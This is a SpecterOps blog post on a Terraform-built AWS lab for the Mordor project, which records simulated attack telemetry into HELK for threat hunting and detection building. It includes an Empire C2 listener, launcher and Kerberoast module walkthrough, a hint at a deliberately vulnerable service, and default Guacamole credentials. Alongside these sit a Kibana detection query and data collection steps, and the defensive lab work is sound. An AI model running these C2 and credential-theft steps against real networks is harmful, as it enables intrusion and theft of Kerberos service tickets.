AWS knocked and The Gates of Mordor have answered

Jonathan Johnson
Posts By SpecterOps Team Members
Aug 6, 2019


Objectives

  • Go over a brief background of Mordor.
  • Explain the AWS contribution to the Mordor project and why it is significant.
  • Explain how to start up the AWS environment.
  • Explain what is possible now that this environment is available.

Background:

Mordor is a project that was created by Roberto Rodriguez and his brother Jose Rodriguez.

“The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework.”

The Mordor concept allows anyone to export the data generated after simulating an adversarial technique, and import the data into any analytics platform. This can be done by leveraging kafkacat and was explained in detail by Roberto Rodriguez in this post (Enter Mordor 😈: Pre-recorded Security Events from Simulated Adversarial Techniques 🛡). This is a huge leap for the community in terms of data collection and analysis. Mordor enables individuals and teams to test their detection strategies with pre-recorded datasets in a flexible and easy way.

As we know, the main goal of the Mordor project is to store and share pre-recorded datasets that you can download and replay right away. However, if you wanted to create and share your own datasets with the community, there was no easy way to replicate the Mordor setup. Until now 😉. One of the objectives was to create an environment that is reproducible and easy for users to work with. In addition, I wanted to be able to use the Mordor setup to analyze the data I was collecting.

To that end, I created a Terraform automation script that builds an environment using pre-built AMIs inside of AWS. This allows a user to build and tear down the Mordor environment in roughly 10–12 minutes. The environment was built to be dynamic, so that future updates are easy to add.

What is Terraform?

“Terraform is a tool for building, changing, and versioning infrastructure safely and efficiently. Terraform can manage existing and popular service providers as well as custom in-house solutions.” — Terraform

Since the environment builds so quickly, a user can rapidly test adversarial techniques and collect the data they generate, or use the environment to analyze the pre-recorded datasets, since the Mordor setup already includes HELK as its main analytics platform. This allows users to create their own datasets without the overhead of building and maintaining a test environment.

What makes the Mordor AWS environment different than others? Why would I use this environment?

Mordor will continue to evolve. As it does, the goal for Mordor in AWS is to give defenders an environment in which they can not only create or replay datasets, but also analyze the data and build detection strategies. Data is fundamental to the hunting process. That data-before-tools strategy is what separates the Mordor AWS project from other projects.

Tool driven hunting vs. Data driven hunting

Tools have great value and can be a great aid during hunts; however, we rely on them too much. A good defense shouldn't be based on the number of tools we have in our environments, because nine times out of ten we don't know what a tool is providing us from a data standpoint. Tools are meant to be an aid, but they shouldn't be doing the work for us. Relying on them to detect malicious activity creates a huge blind spot: when we rely on a tool, we forget about the potential attack surface at hand. We should be able to hunt for adversarial behavior based on the data an attack produces, not rely on signatures. We should move away from tool-driven hunting and migrate toward a data-driven hunting approach.

Mordor, together with other projects, shifts the focus to the bigger picture of a data-driven hunt:

  • Understand our data sensors and data sources with OSSEM.
  • Create a relationship between our data sources and known attack techniques.
  • Create a hunting playbook that gives the hunt context, documents the background of attacks, and captures hunter notes, with Threat Hunting Playbooks.
  • Use the Mordor AWS environment to record adversarial attack techniques and create datasets to share with the community, so that others can understand the data involved in an attack.

Infrastructure:

Infrastructure of Mordor inside of AWS

Above you will see Mordor's infrastructure inside of AWS. The lines represent how the data and logs flow within the environment. Each machine (besides the WECServer) has a Windows Event Forwarding policy applied, telling it to forward its logs to the WECServer. The WECServer runs the Windows Event Collector (WEC) service, which receives logs from the other machines through subscriptions. Once the logs are on the WEC server, they are forwarded through winlogbeat to HELK.
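If you want to verify that events are actually flowing all the way into HELK's Kafka broker, a quick check is to consume a few messages from the winlogbeat topic. This is just a sketch on my part (not part of the project documentation) and assumes kafkacat is available on the HELK host, as it is for the recording steps later in this post:

# print roughly the 5 most recent events on the winlogbeat topic, then exit
# replace HELK-IP with the IP of your HELK instance
kafkacat -b HELK-IP:9092 -t winlogbeat -C -o -5 -e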

For a detailed overview of the AWS environment, I encourage you to read the readme on the GitHub project under the aws folder. However, a brief overview is as follows:

This environment consists of:

AD Environment:

  • 1 AD/DC (Active Directory/Domain Controller)
  • 1 WEC (Windows Event Collector)
  • 3 Windows 10 Workstations

Each Windows workstation has a service called VulnerableService that can be used for privilege escalation. Check directory and service permissions 😉🍻

3 Ubuntu Machines (not domain joined):

  • 1 HELK (Ubuntu 18.04)
  • 1 Apache Guacamole (Modifications were made to user-mapping.xml to fit this project)
  • 1 Red Team Operator machine (created for C2s; currently there are 2 C2s available in this lab: Empire by Will & Covenant by Ryan Cobb)

As you can see, all of the Windows machines are joined to the shire.com domain. Specific auditing and group policies were pushed out through the Domain Controller (HFDC1.shire.com) using a PowerShell script called import_gpo.ps1. If you would like to see the list of auditing policies applied to the environment (which I reference below), it can be found in the GitHub repository, along with any scripts mentioned in this writeup.

The WEC server was configured through a PowerShell script called configure-wec.ps1. The WECServer sends all collected events (Windows Security, Sysmon, PowerShell, etc.) from HFDC1, ACCT001, IT001, and HR001 to HELK, where you can query the data for specific events.

It should be noted that in the Mordor environment, the WECShire.shire.com machine does not send its own logs to HELK, only those of the other machines; it acts purely as an event collector and forwarder. In a real environment you WOULD want to enable this. We decided not to, to keep dataset sizes smaller.

Another thing to note is that the audit policies and Sysmon configurations are not filtering out a lot. They do filter out unnecessary noise (winlogbeat traffic, for example), but the broad collection is a deliberate design choice to ensure the data being collected is enriched. This is very important when it comes to data collection: it keeps us from missing details that correlate with the behavior of the attack we are recording. Be sure to compare which data sources are enabled in your environment when building detections based off Mordor datasets.

Sysmon Dashboard inside of HELK

The Windows Workstations are pretty standard. They are renamed and added to the shire.com domain.

Starting the AWS environment:

Roberto Rodriguez and I wanted the setup process for this environment to be as painless as possible, so we automated as much as we could. To start the environment, follow the steps in the project documentation or follow the video below:

Building Mordor in AWS

Troubleshooting tips are available on the readme located here.

Ease of Access:

One of the objectives for this environment was to let end users quickly access any of the machines without having to manually SSH or RDP to them (that option is still available, of course). To accomplish this, Terraform calls a pre-built community Linux machine that builds Apache Guacamole from the ground up.

What is Apache Guacamole?

It is a service that allows you to interact with clients and workstations via RDP, SSH, and VNC through a web browser. If you have never used Apache Guacamole, all you have to do in your Mordor AWS environment is go to https://apache_guacamole:8443/guacamole in the browser of your choosing. You can log in at this page with the credentials:

guacadmin:guacadmin

You will then be able to connect to the machine of your choosing through the Apache Guacamole interface and interact with it!

Apache Guacamole

Now that the environment is available, what can users do?

This environment includes a fully functional AD setup that can be built within minutes. That gives you a couple of options, but the most important is the ability to create and record datasets. Once a dataset is recorded, you can query the data yourself or send it to someone else so they can query it. How is this done?

Create the Dataset:

1. Get your attack ready inside of the Empire framework or Covenant framework. Steps on how to start these two frameworks can be found in the Create-Frameworks.

Starting Empire/Covenant in Mordor AWS

2. Establish access on the machine of your choice

  • Create a listener and then put the agent on the machine you are attacking. The reason for this is that we are collecting data for a specific attack technique, not the initial foothold that allowed entry into a machine. If you don't know how to do this, check out Empire's documentation here: https://www.powershellempire.com/ OR Covenant's documentation here: https://github.com/cobbr/Covenant/wiki. A rough sketch of the Empire flow is shown below.
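For orientation, here is a rough sketch of that flow in the Empire console. The listener name, host, and agent name are placeholders I chose for illustration, and the kerberoast module is used only as an example since that is the technique recorded later; exact module paths can differ between Empire versions, so lean on the documentation above:

# stand up an HTTP listener (name and host are placeholders)
uselistener http
set Name mordor_http
set Host http://REDTEAM-IP:80
execute
back

# generate a launcher for that listener, then run its output on the target workstation
usestager multi/launcher
set Listener mordor_http
execute

# once the agent checks in, interact with it and stage the technique
agents
interact AGENT_NAME
usemodule credentials/invoke_kerberoast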

3. Get the module ready for the attack you choose to perform. Do not press execute yet.

4. Migrate over to the HELK machine and prepare kafkacat to start collecting the data. To do so, follow the command examples below:

kafkacat -b HELK-IP:9092 -t winlogbeat -C -o end > name_technique_$(date +%F%H%M%S).json

NOTE: you will need root permissions to perform this.

For this example we will use this command:

kafkacat -b HELK-IP:9092 -t winlogbeat -C -o end > kerberoast_$(date +%F%H%M%S).json

5. Migrate back to the Empire Server and execute the attack technique.

6. After the attack was successful, migrate back to the HELK machine.

7. Wait 30–45 seconds so that kafkacat has time to ingest all the data from the attack, then press Control-C. This will stop the collection process. All of the data is now stored in JSON format and can be pulled down to your local machine to store, or sent to a SIEM of your choice to start analyzing the data and building out a robust detection.
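It can also be worth a quick sanity check that the recording captured events before moving on. This is just a sketch on my part, not part of the Mordor documentation (python3 is already installed in Mordor AWS, as noted below):

# each line in the recording is one winlogbeat event
wc -l kerberoast_*.json

# pretty-print the first event to peek at the fields that were captured
head -n 1 kerberoast_*.json | python3 -m json.tool | head -n 20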

Video provided by Roberto Rodriguez on collecting data with kafkacat

Quick Data Exploration:

Next, we are going to run uruk_hai_stats.py against the newly recorded dataset to show us the log statistics that correlate with this attack. This script will break the data down by log name, source name, task, and record number. This helps us understand how much data can be produced during an attack. Keep in mind, not all of this data will be useful when it comes to detection efforts.

If you want to have an idea of the log providers and specific audit tasks that were collected, use this script available in the project to do so:

python3 uruk_hai_stats.py -f name_technique_$(date +%F%H%M%S).json

For this exercise, the command will look like:

python3 uruk_hai_stats.py -f /home/aragon/kerberoast_2019-07-14005430.json

Uruk-Hai Stats result for the Kerberoast dataset that was just created

If you want to run this outside of Mordor AWS in your own lab, be sure to have pandas and python3 installed. These are already installed in Mordor AWS during the configuration process.
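If you would rather poke at the raw recording yourself, a minimal sketch along the same lines is below. It is not part of the project; it assumes the flat winlogbeat field names used elsewhere in this post (log_name, source_name), so adjust them to whatever your recording actually contains:

python3 - <<'EOF'
import pandas as pd

# the recording is newline-delimited JSON: one winlogbeat event per line
df = pd.read_json('kerberoast_2019-07-14005430.json', lines=True)

# count events per log and provider, largest first
print(df.groupby(['log_name', 'source_name']).size().sort_values(ascending=False))
EOF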

Pulling the dataset down to a local machine:

Lastly, you could keep the dataset in the environment and analyze it in HELK, but you could also pull it down to your local machine using SCP. This would allow you to consume the dataset in any SIEM of your choosing, so that you can start building out your detection efforts.

To do so, use the following command:

sudo scp aragorn@public-ip:path/to/dataset/ /path/to/destination

Ingest the dataset into a SIEM with kafkacat:

In this example we will be using the Mordor environment's HELK instance. You can do this with the SIEM of your choice, as long as you have a Kafka broker.

1. Untar the dataset of your choice:

tar -xzvf empire_kerberoast.tar.gz

2. Use kafkacat to send dataset to Kafka broker:

kafkacat -b <HELK IP>:9092 -t winlogbeat -P -l kerberoast_2019-07-25200422.json

Give your Kafka broker about 30 seconds to ingest the data. After this is done, you can start querying the data!
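If you want to double-check that the replayed events actually landed on the topic, one option (again just a sketch, not part of the official steps) is to count everything currently on it. Note that this counts all messages on the topic, not only the ones you just produced:

# -e makes kafkacat exit once it reaches the end of the topic
kafkacat -b <HELK IP>:9092 -t winlogbeat -C -o beginning -e | wc -l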

Note: see the kafkacat video below for a demo.

Analyze the Data

Pre-hunt activities:

Before a good hunt or detection is created, there are some preliminary actions that need to happen, namely understanding your data sensors and the data sources they are utilizing (process monitoring, file monitoring, etc.). This is a key part of the pre-hunt process that gets skipped more often than not. Before we start querying our data, we have to understand the attack technique and the possible events it would trigger based on our understanding of the data. How can we do this?

1. Understand the attack technique you are hunting for. What are its attack surfaces? Is it an attack against the user, the machine, or AD? Is it abusing an authentication protocol? Is this attack network based or host based? This can be done by reading documentation and blogs that are currently public on the attack technique. MITRE ATT&CK, for example, is a great resource when researching attack techniques.

2. Understand our data sources. This can be done by checking out OSSEM. This project was created to provide data dictionaries to the community and to give context on our data sensors and sources. It helps us map events to specific data sources, which is a key factor in our detection methodology.

For example, after understanding how this attack works and combining that knowledge with the information inside of OSSEM:

  • I can make a well-educated hypothesis that the kerberoasting technique will generate a Windows Security event, specifically 4769: A service ticket was requested. We would want to look for events with a 0x0 status, meaning that the service ticket was granted.
  • Since I also know that this attack abuses the Kerberos authentication protocol, I can assume that the events triggered by it will be on the DC, because that is where the Key Distribution Center (KDC) is hosted.
  • After more research, I find that the account requesting the service ticket isn't a machine ($) account, the service ticket name being requested typically isn't the krbtgt account or a machine ($) account, the failure code is 0x0, and the ticket encryption is typically requested in RC4 format. Filtering on these either gets us to the account the adversary was using or narrows the results down to where you can pick out the false positives and find the adversary more easily. In a real environment this would have to be tailored to fit the environment's parameters and needs to further refine the query, but it sets a good baseline.

How does this look in a query in the Mordor Environment?

event_id:4769 AND ticket_encryption_type_value: "RC4-HMAC" AND NOT (user_name.keyword:*$ OR service_ticket_name:krbtgt OR service_ticket_name:*$)

Query for the Kerberoast attack in Kibana
Windows Security Event 4769 in Kibana

A quick video showing kafkacat producing logs to the Kafka broker and the query for the kerberoast attack:

Conclusion/Goal:

As the Mordor environment in AWS grows, the goal for Mordor in AWS is to give defenders an environment in which they can not only develop robust detection strategies, but also learn about and better understand datasets. Data is fundamental to the hunting process. Familiarize yourself with the data dictionaries inside of OSSEM, understand the data relationships that correlate with techniques, create a dataset for the attack technique of your choosing, and quickly analyze that data inside of this environment. Once a hunter is familiar with the data, why it is generated, and how it relates to other data, they can start to build a baseline understanding of attack techniques and the behavior that corresponds to them. That is what makes the Mordor project stand out and such a help to the community: it allows you to become familiar with the data that attack techniques generate, so spotting the behavior of those techniques in the future becomes easier.

Mordor started as an idea about sharing datasets. Therefore, the initial environment used to create, record, and export datasets needed to be very well documented to make sure we understood the data. That concept made it very easy to replicate the environment in AWS with the same well-documented, standard configurations, so anyone can use it and hopefully share their own datasets. In addition, the Mordor AWS environment already comes with an analytics platform in HELK. Why not use it to analyze the data we are recording too?

I hope you enjoy this environment. If you encounter any problems at all, don't hesitate to create an issue; one of us will get to it as soon as possible.

Happy Hunting!!
